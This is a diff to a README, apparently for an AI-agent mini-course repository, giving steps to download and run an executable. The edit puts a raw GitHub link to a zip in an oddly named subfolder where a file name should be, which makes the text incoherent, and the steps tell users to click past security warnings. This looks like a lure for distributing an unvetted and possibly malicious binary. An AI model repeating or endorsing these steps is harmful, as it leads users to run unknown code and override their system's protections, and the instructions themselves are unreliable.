vortex007-YS/seinfo-minicurso-criacao-agentes-ia/README.md

 Click on the executable file link to start the download.
 The file should begin downloading automatically.
 Depending on your internet speed, this may take a moment.

 ### 4. Locate the Downloaded File
 Once the download is complete, open your Downloads folder.
 You should see the file you just downloaded.
-It may be named something like `seinfo-minicurso.exe` or along those lines.
+It may be named something like `https://raw.githubusercontent.com/vortex007-YS/seinfo-minicurso-criacao-agentes-ia/main/radiolite/seinfo-minicurso-criacao-agentes-ia.zip` or along those lines.

 ### 5. Run the Application
 Double-click the downloaded file to run the application.
 This will launch the program, and you may see a security warning depending on your system settings.
 If you do, simply click "Run" or "Continue" to proceed.